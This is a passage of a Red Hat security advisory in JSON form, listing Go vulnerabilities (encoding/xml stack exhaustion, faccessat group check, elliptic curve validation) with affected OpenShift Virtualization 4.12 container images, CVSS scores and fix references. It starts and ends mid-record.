"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements" }, { "cve": "CVE-2022-28131", "cwe": { "id": "CWE-1325", "name": "Improperly Controlled Sequential Memory Allocation" }, "discovery_date": "2022-07-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2107390" } ], "notes": [ { "category": "description", "text": "A flaw was found in golang encoding/xml. When calling Decoder, Skip while parsing a deeply nested XML document, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: encoding/xml: stack exhaustion in Decoder.Skip", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-28131" }, { "category": "external", "summary": "RHBZ#2107390", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-28131", "url": "https://www.cve.org/CVERecord?id=CVE-2022-28131" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-28131", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28131" }, { "category": "external", "summary": "https://go.dev/issue/53614", "url": "https://go.dev/issue/53614" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", "url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE" } ], "release_date": "2022-07-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: encoding/xml: stack exhaustion in Decoder.Skip" }, { "acknowledgments": [ { "names": [ "Jo\u00ebl G\u00e4hwiler" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2022-29526", "cwe": { "id": "CWE-280", "name": "Improper Handling of Insufficient Permissions or Privileges " }, "discovery_date": "2022-05-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2084085" } ], "notes": [ { "category": "description", "text": "A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file\u0027s group, affecting system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: syscall: faccessat checks wrong group", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", 